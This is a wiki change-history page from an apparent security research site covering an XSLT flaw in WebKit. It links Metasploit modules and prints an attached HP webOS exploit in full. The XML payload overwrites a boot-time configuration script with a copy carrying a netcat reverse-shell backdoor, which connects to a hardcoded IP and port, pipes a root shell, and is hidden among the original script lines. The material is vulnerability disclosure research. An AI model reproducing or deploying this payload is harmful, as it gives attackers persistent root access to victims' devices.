Skip to Content

Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48
From version Icon 6.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 23:57
Change comment: Deletion of attachment xslt2root.xml
To version Icon 8.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 00:08
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -28,7 +28,7 @@
28 28  
29 29  PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30 30  
31 -== Exploits ==
31 +== Meatsploit ==
32 32  
33 33  Two modules are included in Metasploit :
34 34  
... ... @@ -35,7 +35,9 @@
35 35  * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
36 36  * an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
37 37  
38 -An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
38 +== HP webOS 3.x ==
39 39  
40 -* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
41 -* XSL reads the XML file and create the requested file on disk
40 +An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
41 +
42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code
43 +* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
Icon webos-root-backdoor.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +1.7 KB
Content
... ... @@ -1,0 +1,54 @@
1 +<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
3 +<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 +
5 +# Backdoor, by Nicolas Gregoire / Agarri
6 +IP="192.168.2.89"
7 +PORT="4444"
8 +
9 +MKNOD="/bin/mknod"
10 +NC="/usr/bin/nc"
11 +FIFO="/tmp/.a"
12 +
13 +( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
14 +# End backdoor
15 +
16 +
17 +# Set this to save a file across reboots to indictate on boot that
18 +# umount happened correctly (and that, e.g. battery wasn't pulled)
19 +MOUNT_STAMP=/var/umount.stamp
20 +# tags used in MOUNT_STAMP
21 +REASON_MARK=reason
22 +CLEAN_UMOUNT_MARK=date
23 +
24 +# name of system property holding true/false based on presence of
25 +# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
26 +# otherwise
27 +MOUNT_PROPERTY=last_umount_clean
28 +
29 +# file that contains 1 if / should be remounted rw, 0 otherwise
30 +REMOUNT_TOKEN="/etc/.rootfs_RW"
31 +
32 +# If an fsck or reformat of /media/internal was required on boot, set
33 +# this property.
34 +MEDIA_FIX_PROPERTY=media_fixed_how
35 +
36 +WIPE_FLAGS_DIR=/var/.flags
37 +WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
38 +WIPE_PROGRESS=/var/.sought_blocks
39 +
40 +# MMC_PROTECT_OPTS=-f
41 +MMC_PROTECT_OPTS=""
42 +MMC_PROTECT_DISABLED=1
43 +mmc_boot_update() {
44 + if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
45 + BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
46 + ON_OFF=1 # on by default
47 + if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
48 + ON_OFF=0
49 + fi
50 + mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
51 + fi
52 +}
53 +]]></content></exploit>
54 +